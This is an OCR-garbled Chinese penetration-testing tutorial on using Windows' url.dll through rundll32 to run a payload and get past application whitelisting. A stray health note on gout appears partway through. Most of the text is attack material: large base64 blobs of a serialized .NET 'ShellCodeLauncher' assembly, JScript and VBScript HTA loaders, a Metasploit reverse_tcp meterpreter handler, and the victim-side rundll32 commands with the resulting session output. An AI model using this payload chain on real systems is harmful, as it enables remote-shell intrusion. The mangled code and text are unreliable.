"V1JJVEUAVmlydHVhbEFsbG9 jAENyZWFOZVRocmVhZABXYWlORm9yU21uZ2x1T2JqZWNOAGxwU3Rh + 
"CcnRBZGRyAHNpemUAZmxBbGxvY2FOaWw9uVHlwZQBmbFByb3R1Y3QAbHBUaHJ 1YWRBdHRyaVW J1dGVz "- 
"AGR3U3RhY2tTaXplAGxwU3RhcnRBZGRyZXNzAHBhcmF tAGR3Q3J1YXRpb25GbGFncwBscFRocmVh" * 
"ZElkAGhIYW5kbGUAZHdNawWxsaXN1Y29uZHMAU31zdGVtL 1N1Y3VyaXRSL1Blcmipc3Npb25zAFNI1"-* 


"Y3VyaXRSUGVybWlzc2lvbkFOdHJpYnVOZQBTZWNicmlOeUF ;jdGlvbgBTeXNOZwGauUnVudGltZS5D"-* 





"b21waWxlclNlcnzpY2VzAENvbXBpbGFOaw9uUmVs YXhhdG1vbnNBdHRyaWJidGUAUnVudGltZUNv"* 
"bxBhdeliawxpdHlBdHRyaWJ1dGUAM;j IyMgBCeXRlADxQcml2YXRlSWi1wbGVtZW5OYXRpb25EZXRh" + 
"aWxzPntBODMyQkQOMS1EQjgyLTQONzEtOEMXRC1BMDlBNDFCQjAzRERSAENvbXBpbGVyR2VuZX Jh " * 
"dGVkQXROcmlidXRlAFZhbHVlVHlwZQBfX1NO0YXRpYOFycmF5SW5pdFR5cGVTaXplPTUXMAAK JG11"-* 
"dGhvZDB4Nj AWMDAWMiOxAF J1bnRpbWVIZWxwZXJZAEFycmF5AF Ji bnRpbwVGawVsZEhhbmRsZQBJ"+ 
"bml0aWFsaXplQXJyYXkASW5OUHRyAG9wXOVA4CGXpY210AFN5C3RIbS5SdW59aW1lLkludGVyb3BT"- 
"2XJ2aWNlcwBNYXJzaGFsAENvcHkAWmVybwBEbGx JbXBvcnRBdHRyaWJ1dGUAa2VybmVsMz LALmN j "+ 
"dG9yAFNSC3RIbSSTZWNicmlOeQBVbnZlcmlmawFibGVDb2RlQXROcmlidXRlAAAAAAADIAAAAAAA' + 


"QbOyqILbcUSMHaCaQbsD3QAI t 3pcVhk04 IkDIAABAWAAAQIGCQCABAk JCQk JCgAGGAK JCRg JEAKF " 
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"ДАТ JGAKFIAEBEQOEIAEBCAQBAAAAAWYREACAAGESKREt BAABGAOIAAQBHQUIGAgCBhgIBWUdBQkY" + 
"CRgEIAEBDggBAAgAAAAAAB4BAAEAVAIWV3 JhcESvbkVAY2VwdGlvblRocm93cwGAni4BgIRTeXNO" * 
"ZwOuU2Vj dXJpdHkuUGVybWlzc21vbnMuU2VjdXJpdHlQZXJtaXNzaw9uQxROcml idXRlLCBtc2Nv"- 
"cmxpYiwgVmVyc21vbj90LjAuMCAwLCBDdWx8dXJ1PW51ldXRyYWwsIFBiYmxpYOtleVRva2VuPWI3"- 


“N2E1YZU2MTkZNGUWODKVAVQCEFNr aXBWZXJpzm1 j YXRpb24BAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


AAAAAAAAAAAAAA" + 





"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 


"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 


"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 





"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"АДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 
“АААААААААААААААААААААААААААААААААААААААААААААОАОААААСАААЦААААААААААААААААААА" + 
"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAABAGAAAAAAAAAAAAABA j QAAABW" + 
"AFMAXWBWAEUAUgBTAEKATWBOAFBASQBOAEYATWAAAAAAVQT V / JAAAQAAAAAAAAAAAAAAAAAAAAAA" + 
"PWAAAAAAAAAEAAAAAGAAAAAAAAAAAAAAAAAAAEQAAAABAF YAY QBYAE YAaQBSAGUASQBUAGYADWAA" + 
_ "AAAA JAAEAAAAVAByAGEAbGBZAGWAYQBOAGKAbWBUAAAAAAAAALAEnAEAAAEAUWBOAH TAa QBUAGCA' + 
| "RgBpAGWAZQB JAGAAZgBVAAAAeAEAAAEAMAAWADAAMAAWADQAY gAWAAAAL AACAAEARGBPAGWAZQBE" + 
i "AGUACWBj AH TAaQBWAHQAaQBVAG4AAAAAACAAAAAWAAGAAQBGAGKADABLAFYAZQByAHMAaQBVAG4A" + 
1 "AAAAADAAL gAWAC4AMAAUADAAAAAOAAKAAQBJAG4AGABLAHIAbgBhAGWAT gBhAGOAZQAAADIAMgAy"+ 
_"ADIAL gBkAGWADAAAAAAAKAACAAEATAB1AGCAYQBSAEMAbWBWAHKACTBpAGCAaABOAAAATAAAADWA"+ 
F "CQABAESAcgBpAGCAaQBUAGEADABGAGKADABlAGAAYQBtAGUAAAAyADIAMgAYACAAZABSAGWAAAAA" + 
ÜADQACARBAFAACGBVAGQAdQB jAHQAVBIAHTACHBDAGBADGARADAALGAVACAAMAAUADAAAAMAAGA" + 


"AQBBAHMAcwB1AGOAYgBSAHKAIABWAGUACgBZAGKAbwBUAAAAMAAUADAAL gAWwAC4AMAAAAAAAAAAA "+ 
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"AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAA J FWAAAAkGAAAACRYAAAAGGGAAACT e XNOZWO uUmVm " + 


"bGVjdGlvbisBc3NlbWJseSBMb2FKkKE J5dGVbXSkIAAAACgSA" ; 


var entry class = 'ShellCodeLlauncher.Program'; 


EGY) a 


setversion(); 


var stm = base64ToStream(serialized_obj); 

var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary. 
var al = new ActiveXObject('System.Collections.ArrayList'); 

var d = fmt.Deserialize_2(stm); 


al.Add(undefined) ; 


var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 


) catch (e) { 


debug(e.message); 


11> 
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script> 


registration» 


/scriptlet» 


1888 


基于 白 名 单 Url.dll 执 行 payload 第 十 七 季 | 


Ж: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 
痛风 可 伴 发 肥胖 症 、 高 血压 病 、 糖 尿 病 、 脂 代谢 紊乱 等 多 种 代谢 性 疾病 。 
Url.dll 简 介 : 

url.dil 是 internet 快 捷 壳 扩展 相关 应 用 程序 接口 系统 文件 。 


说 明 : url.dll 所 在 路 径 已 被 系统 添加 PATH 环 境 变 量 中 ， 因 此 ，url.dll 命 令 可 识别 ， 但 由 于 为 dl 文件 ， 
需 调 用 rundll32.exe 来 执行 。 


Windows 2003 默认 位 置 : 
C:NWindowsNSystem32Nurl.dll 
C:NWindowsNSyswOW64Nurl.dll 

Windows 7 默认 位 置 : 

C: NindowsNSystem32Nurl.dll 
C: NindowsNSysWOWe4Nurl.dll 


攻击 机 : 192.168.1.4 &Debian 
% 41: 192.168.1.3&Windows 7 


配置 攻击 机 msf: 
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* + a à š `‘ > ^ 
msf exploit(multi/handler) » show options 


Module options (exploit/multi/handler): 

Name Current Setting Required Description 

ү Di 

Payload options (windows/meterpreter/reverse tcp): 
Name Current Setting Required Description 


4 EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 


LPORT 53 yes The listen port 


Exploit target: 


“© Wildcard Target 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


i explait frultaishandter} > show options 
Module options (exploit/multi/handler): 


Name Current Setting Required Description 


‘s/meterpreter/reverse tcp) 
-urrent Setting Required Description 
yes Exit technique (Accepted ', seh, thread, process, fone) 
yes The listen address (an interface may be specified) 
yes The listen port 
=xplo1t target 


Id Name 


О Wildcard Target 


msf exploit¢ ti ha r) > exploit 





[*] Started reverse TCP handler on 192,168 





靶 机 执行 : 


rundll32.exe url.dll,FileProtocolHandler file://C:\Users\John\Desktop\Micropoor 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
[^] Sending stage (179779 bytes) to 192.168.1.3 


[*] Meterpreter session 5 opened (192.168.1.4:53 -» 192.168.1.3:5018) at 2019-01 


meterpreter » getuid 
Server username: John-PC\John 


meterpreter » getpid 


Current pid: 8584 





sore ahn sol tiny 


同样 可 以 调用 url.dll 下 载 payload : 
rundll32.exe url.dll, OpenURL 


附录 : Micropoor url dll.hta 
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«script language="VBScript"> 


Dim binary : binary - "rundll32.exe" 


Dim code : code = "/OiCAAAAYInlMcBkilAwiiIMi1IUi310D7dKJjH/rOxhfAISIMHPDQHHAvyJSV 


Sub Debug(s) 
End Sub 
Sub SetVersion 


End Sub 





Function Base64ToStream(b) 
Dim enc, length, ba, transform, ms 
Set enc = CreateObject("System.Text.ASCIIEncoding") 
length - enc.GetByteCount 2(b) 
Set transform = CreateObject("System.Security.Cryptography.FromBase64Transforrm 
Set ms = CreateObject("System.I0.MemoryStream") 
ms.Write transform.TransformFinalBlock(enc.GetBytes 4(b), 0, length), 0, ((1ег 
ms.Position - 0 
Set Base64ToStream - ms 


End Function 


Sub Run 
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s, entry class “ > ER 


" AAEAAAD/ / / / / AQAAAAAAAAAEAQAAAC JTeXNOZWOURGVsZWdhdGVTZXJpYwxpemFOaW9uSG9 sZGV 


54 


s & 


"AwAAAAhEZWX1Z2F0ZQdOYXJnZXQwB211dGhvZDADAwMwU31zdGVt LkRibGVnYXRl1U2VyaWF 
"dGlvbkhvbGRlcitEZWXxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb2*t 
"ZXIvU31zdGVtLlJlzmxlY3Rpb24uTWVtYmVySW5mbiNlcmlhbGl6YXRpb25Ib2xkZXI JAgA 
"AAAACQQAAAAEAgAAADBT eXNOZWOURGVsZWdhdGVTZXJpYWxpemF8aWw9uSG9sZGVyKOR1bGV 
"RW5OCcnkHAAAABHRSCGUIYXNZzZW1ibHkGdGFyZ2VOEnRhcmdldFR5cGVBC3N1bWJseQ50YXJ 
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFNSC3RIDbSSEZWXlZ2F 
"cmlhbGle6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1NSC3RIDbSS5SdW50aW11Ll; 
"aWw5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4 
"MCwgQ3VsdHVyZTi1uZXVOcmF sLCBQdWJsaWNLZX1Ub2t1bj1iNzdhNWM1NjE5MzRlIMDg5Bgc 
"dGFyZ2VOMAkGAAAABGkAAAAPU31zdGVtLkR1bGVnYXR1BgoAAAANRHluYW1pYOludm9rzQc 
"ACJTeXNOZWOURGVsZWdhdGVTZXJpYWxpemFOaW9uSG9sZGVyAwAAAAhEZWXx12Z2F0ZQdOYXJ 
"B211dGhvZDADBwMwU31zdGVtLkRlbGVnYXR1U2VyaWFsaXphdGlvbkhvbGRlcitEZWXlZ2F 
"dHJ5Ai9TeXNOZWOuUmVmbGV j dGlvbiSNZW1iZXJ JbmZvU2VyaWFsaxphdGlvbkhvbGRlicgk 
"CQwAAAAJDQAAAAQEAAAAL1N5C3RlbSS5SZWZsZWNOaW9uLk11bWJlckluzm9TZXJpYWxpemF 
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzcO5hbWUJU21nbmFOdXJlCk11lbWJ 
"CGUQR2VuZXJpYOFyZ3VtZW59cWEBAQEAAWwgNU31zdGVtL1R5cGVbXQKKAAAACQYAAAA JCQ/ 
"AAAALFNSC3RIbSSPYmplY3QgRHluYWipYOludm9rZzShTeXNOZWOuT2 JqZWNOW10pCAAAAAC 
"AAIAAAAGEgAAACBTeXNOZWOUWG1 sL.1N;jaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVNSCS3R 
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZTi1uzXVOcmF sLCBQdWJ saWNLZX1Ub2t 1011 
"NWM1NjESMzRIMDg5BhQAAAAHdGFyZ2VOMAkGAAAABhYAAAAaU31zdGVtL1JlZmxlY3Rpb24 
"ZW1ibHkGFwAAAARMb2FKCg8MAAAAABA4AAA JNWpAAAWAAAAQAAAD/ /WwAAUAAAAAAAAABAAAZ 


" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh--6DgCOCcOhuAFMZSFUaG1z ІНЕ 
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"YWOg Y2Fubm901G211HJ1biBpbiBETIMgbWOkZSANDQOKAAAAAAAAAFBFAABMAQMAKNI qe 
"AAAAAAAiIASBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAE AAAAAAA 
"AAAAAAAAAIAAAAACAAAAAAAAAWBARQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAA 
"AEBAAAAAQAAAKAMAAAAAAAAAAAAAAAAAAAAAAAAA Y AAA DAAAAAAAAAAAAAAAAAAAAAAAAAL 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAATAAAAAAAAAAAAAAAT IAAASAAAAAZ 
"AAAALnRIeHQAAABAFQAAACAAAAAWAAAAAGAAAAAAAAAAAAAAAAAATIAAAYC5yC3 J j AAAAKAN 
"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAUCmV sSb2MAAAWAAAAA YAAAAA IAAAACAAAAAAZ 
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAATABQDAIQAAKBMAAAE AAAZ 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHG I ODWA 
"MAOABWEAAAEAABEEKBAAAAOKEgEG j mkoEQAACnM JAAAGDAgWf TUAAARyAQAACBMECgMAAH/ 
"Cm8TAAAKF j EZChOAAHAoEgAACnI г AABWAY QUAAAKEWQr F31dAABWKBIAAApyQQAACAMOFAZ 
"EQQUFBQXGn4VAAAKFAgSAy gBAAAG Jg 1 7 BAAABBMFE qUoF gAACn JXAABWKBCAAAO SbhEFF nV 
" BYAAMAAAHOAOAGAABHMGE GY oF gAACn JXAABWKBGAAAOSChEFF igEAAAG Ji OWEWCSCAa0aS¢ 
"EQURBgYRCBEHKAMAAAYmEQUWCXEAAAOWEQYWCXEAAAOWFnMRAAAKKAUAAAYmKnoC f hUAAAE 
"BAIoDwAACgICKBKAAAp9AQAABCOAABMWAGBGAAAAAAAAAA J-- FQAACnO r AAAEAn4VAAAK f Su 
"fhUAAAp9LQAABA J-FQAACnO4AAAEAnAVAAAKf TKAAAQCf hUAAAp90gAABA J-- FQAACnO 7AA2 
"AAAKAgTO0GQAACnOqAAAEKK JTSKIBAAEAAAAAAAWAAAB2Mi 4\1. j UWNZ I 3AAAAAAUADAAAACC 
"fgAALACAAEWJAAA j USRyaWSncwAAAADgEAAAXAAAACNVUWABEQAAEAAAACNHVUTEAAAATBE 
"АДА ј QmxvYgAAAAAAAAACAAABVXOCFAKCAAAA- gEZABYAAAEAAAAXAAAACQAAAF AAAAA JAAL 
"ABKAAAAZAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABWAAAAAAmQY BAAAAAAAGAFWF КОС 
"kgcGAIoEYACPALIHAAAGALIEA4QYGADAFAQYGABEFA4QYGALAFAQYGAHWFAQYGA JUFAQYGAMK 
"AJAECWCGAHwECWCGAPQEA4QYGAKs IqQYGAGEEqQYGAEOFqQYGALAGqQYGAMOIqQYGAFKkHqQY 
"qQYGAGYGqQYGAIQGCWwCAAAAA JQAAAAAAAQABAAEAEABt BJAAPQABAAEACGAQAPgHAAA9AAE 


"ARAAzgYAAEEABAA JAATBAAAbCAAASQAIAAKAAgEAADYTIAAB JACCACQAKABAABgCAADOAKgZ 
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" AABLBAAASQABAAOAAgEAAPMCAAB JAEUACGAGAHOG-- gAGAEQHPWAGACQE / QAGAHQIP.WAGAOC 
"AMgD*gAGALOD*gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWg IgCAwFWgMIAAWFWgFMCAwF 
"AwFWgBOCAwFWgAUCAWFWgKABAWFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgEOCAwFWgDE 
"gGoDAwFWgIIDAwFWgJkCAwFWgBODAwFWgHYBAwFWgHUAAWFWgDOAAwFWgCCBAwFWgKgAAwF 
"AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAWEGBp4DAAFWg JEABwFWgHICBWEGAKYD-*gAGAOE 
" ABCHPWAGADMEPWAGAESD+gAGAJoD+gAGAOcF+gAGA08F+gAGAEcI+gAGAFUI+gAGAOQE+g/ 
"+gAGA0c ICWEGAAQACWEGABKAPWAGANI IPwAGANWI PWAGADQHPWAGBp4 DAAFWgN4CDgFWgO0E 
"gJOBDgFWgNgCDgFWgNUBDgFWgASBDgFWg JOBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFCAEgF 
“EgFWgF gDEgFWgGkCEgFWgE8DEgFWgNOAE gFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAA 
"ICAAFgEBAAAAAACAA JY g8wggAQsAAAAAATAALIAICTUBEAAAAAAAGACWI GMI PWEVAAAAAAC 
"1ANFARCAUCAAAAAAhhg-* BwYAHgBY IAAAAACGAEQEUAEeAGShAAAAATY YPgcGACAA j СЕАААА 
"BWYAIAAAAAEAOWQAAA TAUWQAAAMASACAAAQAOQCAAAUAWQCAAAY ACWGAAACAVAGAAAGAHAK 
"BACCAAOAZAYAAAEAGWwQAAAIAiwgAAAMAAwYAAAQAaWQAAAUAS ggGAAAEAdAgAAAIAfQgAAAN 
" AAQAAWYAAAUAt QYAAAEAdAgAAAIA* gMAAAEAdAgAAAIAOQCAAAMA9WUAAAQA 1 QGAAAUAKAC 
"CwgAAAcAsgMAAAEAAGkKAAATAAQA JAD4HAQARAD4HBGAZAD4HCGApAD4HEAAXAD4HEAASAD4 
"AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABXAD4HEAC JAD4HBGBSAD4HBgC 
"KQChADAHAQCpAAQELWCXAHKGNACXAKQIOAChABIHPWChAGQGQgCXADs JRGCXAC8IRGC5AAC 
"ACQAWGAJACGAXWAIJACWAZAA JADAAaQAJADQAbgAJADgACWA JADwAeAA JAEAA f QAJAEQAg g^ 
"hwAJAEWA j AAJAFAAKQAJAFQA1gAJAFgAmwA JAFWAOAA JAGAApQA JAGQAqgA JAGgAr wA JAGv 
"AHAAUQAJAHQAVgAJAHgAWWA JAHWAyAAJAIAAZQAJAIQA0gAJAIgA1WAJAIWA3AAJAJAAA4Q^ 
"5gAJAJgA6wAJAKAAWgAJAKQAXWAJAPQA1gAJAPgAmwA JAPWA8AA JAAABUQA JAAQBAQA JAAC 
"AAWBVvgAJABABWWwA JABgBbgAJABwBCWA JACABeAA JACQBf QAJACgBWgA JACWBXWA JADABZAZ 
"aQAJADgBggAJADwBhwAJAEAB j AAUAASAVgEUABMAXWEUABSAf gEuACMAhwEuACSAhwEUADV 


"ADSAmAEUAEMAhwEUAESAhwEUAFMAmAEUAF sAngEUuAGMApAEuAGSAZgFDAF sAngG j AHMAWgE 
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"wgADAXMAWwgAjAXMAWgAaATwGAAEDAC4AAQAAAQUABwgBAAABBwAJCQEAAAEJAGMIAQAAAQ 
"AASAAAABAAAAAAAAAAAAAAAAAPCAAAACAAAAAAAAAAAAAABRAKKDAAAAAAMAAgAEAAIABQA 
"AgAHAAIACAACAAKAAgAAAAAAAHNOZWXSY29KkZTMyYAGNiUmVZzZXJ2ZwWQyYAGxwUmVzZXJ2ZWC 
"b2R1bGU-AENyZWFOZVByb2N1c3NBAENSRUFURV9CUKVBSOFXQV1 f R1JPTV9KTOIARVhFQ1y 
"RUFEAENSRUFÜRV9TVVNQRUSERUQAUF JPQOVTU19NTORFXO0 JBQO t HUKOVTKRfRUSEAERVUEx 
"RV9DTE9TRV9TT1VSQOUAQ1JFQVRFXORFRKFVTFRfRVJST1 Jf TUSERQBDUKVBVEVf TkVXXON 
"TEUARVhFQ1VURVOSRUFEV1 J JVEUARVhFQ1VURQBSRVNFUIZFAENBQ1RVU1RPUKNIAFdSSVR 
"VENIAFBIWVNJQOFMAFBSTOZJTEVf SOVSTkVMAENSRUFURV9QUKVTRVJWRV9DTORFXOFVVEF 
"VkVMAENSRUFURVSTSEFSRURfV09XX1ZETQBDUkVBVEVfUOVQQV JBVEVf VO9XX1ZETQBQUKE 
"XO1PREVfQkFDSOdST1VORF9CRUdJTgBUT1BfRE9XTgBHTWBDUkVBVEVf TkVXX1BSTONFU1NA 
"VVAAUF JPRkK LMRV9VUOVSAF BST OZ JTEVfUOVSVkVSAEXBUKdFX1BBROVTAENSRUFURV9GT1J 
"UwBJREXFX1BSSU9SSVRZXONMQVNTAF JFQUXUSULFXIBSSUSSSVRZXONMQVNTAEN JROh f UF 2 
"VF1fQOxBU1MAQUJPVkVf Tk9STUFMX1BSSUSSSVRZXONMQVNTAE JFTE9XX05PUK1BTF9QUK1 
"WV9DTEFTUWBOTOFDQOVTUWBEVVBMSUNBVEVfUOFNRV9BQONFU1MAREVUQUNIRURfUF JPQOV 
"UkVBVEVfUF JPVEVDVEVEX1BSTONFU1MAREVCVUdfUF JPQOVTUWBERU JVR19PTKkxZX1RISVN 
"QOVTUWBSRVNFVABDTO1NSVQAQ1 JFQVRFXO1HTk9SRV9TWVNURU1. f REVGQVVMVABDUKVBVEV 
"QO9ERVSFT1ZJUK90TUVOVABFWFRFTKRFRF9TVEFSVFVQSUSGT19QUKVTRUSUAENSRUFURVE 
"SUSETACAZHQYAF JFQURPTKXZAEVYRUNVVEVFV1J JVEVDT1BZAElOSEVSSVRfUEFSRUSUXOF 
"SVRZAE1OSEVSSVRfQOFMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1z Y29ybGliAG* 
"ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nl1c3NJZABDcmVhdGVSZW1vdGVUaHJ1YWQAaFRocimV 
"CcFJlc2VydmVkAHVFeG10Q29kZQBHZXRFbnZpcm9ubwVudFZhcmlhYmxlAGxwSGFuZGx1AG: 
"cml0SGFuZGxlAGxwVGlObGUAbHBBCHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYWS5kTO61 
"YwWx1ZVR5cGUAZmxBbGxvY2FOaWg9uVHlwZQBHdWlkQXROcmlidXRlAERlYnVnZ2FibGVBdHk 


"dGUAQ29tVmlzaWJsZUFOdHJpYnVOZQBBc3N1bWJseVRpdGxlQXROcmlidXRlAEFzc2VtYmx 


1897 





"ZGVt YXJrQXROcmlidXRlAGR3RmlsbEFOdHJpYnVOZQBBc3N1UNJseUZpbGVWZXJz aW9uQXF 
"dXRIAEFzc2VtYmx5Q29uZmlndXJhdGlvbkFOdHJpYnVOZQBBc3N1bWJseURlc2NyaXBOawec 
"cmlidXRlAEZsYWdzQXROcmlidXRlAENvbXBpbGFOaWg9uUmVsYXhhdGlvbnNBdHRyaWJ 1dGL 
"ZWiibHlQcm9kdWNOQXROcmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXROcm1idXRlAEFzC2V 
"Q29tcGFueUFOdHJpYnVOZQBSdW50aW11Q29tcGFOaWJpbGlOeUFOdHJpYnVOZQBkdihTaX[ 
"WVNpemUAZHdTdGF ja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZm11cmzsYWCATKkS 
"RV9Nb2RpZmllcmzsYWCAViJJVEVDTO1CSUSFX01vZGlmaWVyZzmxhZwBGcm9t QmFzZTYOU3F 
"AFRvU3RyaW5nAGNhY3RiciRvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi 5kbGw 
"VFVTVE9SQ8guZGxsAFNSc3RIbQBFbnVtAGxwTnVt YmVyT2ZCeXR1cidyaXROZWAAbHBQcme 
"SWw5mb3JtYXRpb24AU31zdGVtL1JlZmxlY3Rpb24ATWVtb3J5UHJvdGV;j dGlvbgBscFNOYXJ 
"bmZvAFplcm8AbHBEZXNrdG9wAGJi1ZmzlcgBscFBhcmFtZXRlcgBoU3RkRXJyb31ALmNOb31 
"ZWNicmlOeURlc2NyaXBOb3IASW5OUHRyAFNSCG3R1bS5EaWFnbm9zdG1jcwBTeXNOZWOUUnV 
"ZS5JbnRlcm9wU2VydmljZXMAUS31zdGVtLlJibnRpbWwUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ 
"bmdNb2RlcwBiSW50ZXJpdEhhbmRsZXMAbHBUaH J1YWRBdHRyaWJ1dGVzAGXWUH JvY2Vz COF 
"YnVOZXMAU2V jdXJpdHl1BdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm?9 j ZXN 
"Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdwW59Q2hhcnMAZHdZQ291bnRDaGF 
"ZXJtaw5hdGVQcm9 ј ZXNzAGhQcm9j ZXNZAGxwQmF zZUF kZH J 1c 3MAbHBBZGRyZXNZAGXWUSR 
"ZGRyZXNzAENvbmNhdABPYmp1Y3QAZmxQcm90ZWNOAGXxwRW52aX Jvbm11bnQAQ29udmVydAE 
"SW5wdXQAaFNOZE91dHB1dAB3U2hvdidpbmRvdwBWaXJOdWF sQWxsb2NFeABiaW5hcnkAV3J 
"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmV j d69yeQBvcF9FcXVhbGl0eQBvcF9 JbmVxdWF 
"AAAAAAABABIQAHIAbWBnAHIAYQBtAFCANgAOADMAMgAADXCAaQBUAGQAaQByAAAVXABTAHK 
"AESAVWA2ADQAXAAAF VWAUWBSAHMAdABlAGOAMWAyAFWAAAMWAAAARY -bZ uL qxE--aSSAzL s 
"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgc JHQUYEhwREA4YGAgYBQABHQUOBAABD9g4DIAA 


"Dg4ODgIGGAMgAA4FAAICDgAEAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBA 
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" TAAAAARAAAAABTAAAAAEAAE AAA QAAgAABAAEAAAEAAGAAAQREAAABAAGAAAEAEAAAAQA gag 
"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAGQAAAAE BAAAAAGEAAAAEAC 
"BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBg I CBgkDBhEUAwYRGAIGBgMGESADBhEKEWAKGA4 
"DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGBOFGAgFAAICGAKKAACYGBg JGBg JGAUgAgE 
" AAgAAAAAABABAAEAVAIWV3 Jh cESvbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQOF 
"VE9SQOgAAAUBAAAAAAUBAAEAACKBACQAN j USOGYXYyO2ZDg4LTQSOTQt YTMSMi1hZjMzN2F 


"NZCAAAWBAACXxL ) AuMCAWAAAASDUAAAAAAAAAAAAAY j UAAAAgAAAAAAAAAAAAAAAAAAAAAAA 


"AFQ1AAAAAAAAAAAAAAAAXON vc kKRsbE1haWAAbXN j b3J1ZS5kbGwAAAAAAP8 LACAAEAAAAAA 





"ДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABGAATAAAAAAAAAAAAAAAAAAAAE 
"ADAAAIAAAAAAAAAAAAAAAAAAAAE AAAAAAE GAAABY QAAANAMAAAAAAAAAAAAANAMOAAAAV GE 
"VgBFAF IAUWBJAESATgBFAEKAT gBGAESAAAAAAL ӨЕ7 / 4AAAEAAAABAAAAAAAAAAEAAAAAADE 
" AAAABAAAAA T AAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEACGBGAGKADAB LAE KAbgBmAGBAAAA 
"BAAAAFQACQBhAGA4ACWBSAGEAdABpAGBAbGAAAAAAAACWB JOCAAABAF MAdAByAGkAbgBnAEY 
" AGUAS QBUAGY AbWAAAHACAAABADAAMAAWADAAMAAOAG I AMAAAADAADAABAEMADWBt AGOAZQE 
" CWAAAEMAQQBDAFQAVQBTAFQATWBSAEMASAAAACIAAQABAEMADwB t AHAAY QBUAHKATGBhAGE 
" AAAAAAAAAEAADAABAE YAaQBSAGUARAB TAHMA YWBy AGKACABOAGKADWBUAAAAAABDAE EAQWE 
" UwBUAE 8AUgBDAE gAAAAWAAGAAQBGAGKAbAB 1AF YAZQByAHMAa QBVAGA4AAAAAADEAL gAWAC4 
" ADAAAABAABAAAQB JAG4AGAB1AH IAD gBhAGWAT gBhAGOAZQAAAEMAQQBDAFQAVQBTAFQATWE 
" SAAUAGQADABSAAAAPAAMAAEATAB LAGCAY QBSAEMADWBWAHKACgBpAGCAaABOAAAAQWBBAEN 
"AFMAVABPAF LAQWBIAAAAKgABAAEATABLAGCAYQBSAF QACgBhAGQAZQBtAGEACgBr AHMAAAZ 
"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGWAZQBUAGEAbQB1AAAAQuBBAEMAVABVAF 


"AFIAQWBIACAAZABSAGWAAAAA4AAVAAQBQAHIADWBKAHUAYWBOAE 4AYQBt AGUAAAAAAEMAQQE 


1899 





s = 5 4 "VQOBTAFQATWBSAEMASAAAADQACAABAF AAC gBVAGQAdQBj AHQAVYBILAHTACWBPAGSADGAAADE 
5 = 5 & "ACAAMAAUADAAAAA4AAgAAQBBAHMACWB1AGOAYgBSAHKATABWAGUACQBZAGKAbwBUAAAAMQ^ 


s = S & "LgAWACAAMAAAAAAAAAAAA 





